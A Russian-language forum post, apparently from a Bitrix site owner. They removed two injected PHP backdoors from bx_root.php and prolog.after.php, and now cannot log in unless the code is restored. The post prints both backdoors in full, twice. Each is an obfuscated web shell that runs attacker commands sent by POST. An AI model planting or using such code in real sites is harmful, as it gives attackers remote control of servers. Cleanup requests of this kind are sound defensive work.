Помогите, пожалуйста, вылезает проблема с авторизацией
Удаляю этот кусок кода из bx_root.php [QUOTE]
Используя ДРУГУЮ уязвимость поражают \bitrix\modules\main\bx_root.php дописывая в его конец это:
<? if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "") parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))); ?>[/QUOTE]
и вот этот из prolog.after.php
[CODE]define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4="));
if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){$APPLICATION->RestartBuffer();CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);die();}[/CODE]
Удаляю этот кусок кода из bx_root.php [QUOTE]
Используя ДРУГУЮ уязвимость поражают \bitrix\modules\main\bx_root.php дописывая в его конец это:
<? if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "") parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))); ?>[/QUOTE]
и вот этот из prolog.after.php
[CODE]define("BX_CONTROLLER_CLIENT_X", base64_decode("QlhfVE9LRU4="));
if(isset($_POST[BX_CONTROLLER_CLIENT_X]) && !empty($_POST[BX_CONTROLLER_CLIENT_X])){$APPLICATION->RestartBuffer();CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);die();}[/CODE]
После этого на сайт не получается авторизоваться, пишет в адресной строке [URL=https://xn--80aswg/auth/?login=yes]https://сайт/auth/?login=yes[/URL] и ничего не происходит, не выдает ошибок, все на том же окне авторизации. Если попытка войти в админку, то после "войти" черный экран фона админки и все
Если эти куски кода возвращаю - авторизация снова проходит в обычном режиме....куда еще нужно посмотреть? почему может быть такой эффект от удаления этого кода, которого изначально не было
жду помощи 🙏
[FONT=Verdana][/FONT]
